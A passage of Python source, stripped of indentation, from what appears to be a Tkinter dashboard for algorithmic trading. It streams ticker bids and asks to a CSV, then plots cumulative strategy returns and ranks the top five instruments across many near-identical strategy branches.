tickers[enum]['direction'] = self.arrowHead(previous_bid, tickers[enum]['bids'])
df = pd.DataFrame([x for x in tickers], columns=['tickers', 'bids', 'asks', 'direction'])
df.to_csv(os.path.join(self.path['mainPath'], 'TICKERS/streams.csv'))
print(tickers)
except:
pass
n += 1
try:
if n > 10:
time.sleep(10)
except:
pass
continue
except:
pass
#--Recommendation
class Returns(ttk.Frame):
def __init__(self, master, path):
ttk.Frame.__init__(self, master)
self.path = path
self.figsize = (12, 7)
self.ncol = 8
optionFrame = ttk.Frame(self)
style = ttk.Style()
style.map('TCombobox', fieldbackground=[('readonly','#e3104f')])
style.map('TCombobox', selectbackground=[('readonly', '#e3104f')])
style.map('TCombobox', selectforeground=[('readonly', 'white')])
strategy = tk.Label(optionFrame, text = 'Strategy').grid(row = 1, column = 0)
self.strategyOption = ttk.Combobox(optionFrame, values = self.path['strategy'], state = 'readonly')
self.strategyOption.current(32)
self.strategyOption.focus()
self.strategyOption.grid(row = 1, column = 1, padx = 20, pady = 10)
self.strategyOption.bind("<<ComboboxSelected>>", self.callback)
#timeframe frame
timframe = tk.Label(optionFrame, text = 'Timeframe').grid(row = 1, column = 2)
self.timeOption = ttk.Combobox(optionFrame, values = self.path['timeframes'], state = 'readonly')
self.timeOption.current(2)
self.timeOption.focus()
self.timeOption.grid(row = 1, column = 3, padx = 20, pady = 10)
self.timeOption.bind("<<ComboboxSelected>>", self.callback)
self.update = tk.Button(optionFrame, text = 'Update', bg = '#a1a09f', command = self.plotReturns).grid(row = 1, column = 4, padx = 20, pady = 10)
#option frame
optionFrame.grid(row = 0, column = 0)
self.plotReturns()
def callback(self, eventObject):
return eventObject.widget.get()
def plotReturns(self):
from collections import Counter
returnplot = ttk.Frame(self)
pairs = path['instruments'].split(',')
grabstrategy = str(self.strategyOption.get())
grabtimeframe = str(self.timeOption.get())
Framesort = tk.Frame(self)
if grabstrategy == str(1):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM, fill = tk.BOTH, expand = True)
elif grabstrategy == str(2):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(3):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(4):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(5):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(6):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(7):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(8):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(9):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(11):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(22):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(33):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(44):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(55):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(66):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(77):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(88):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
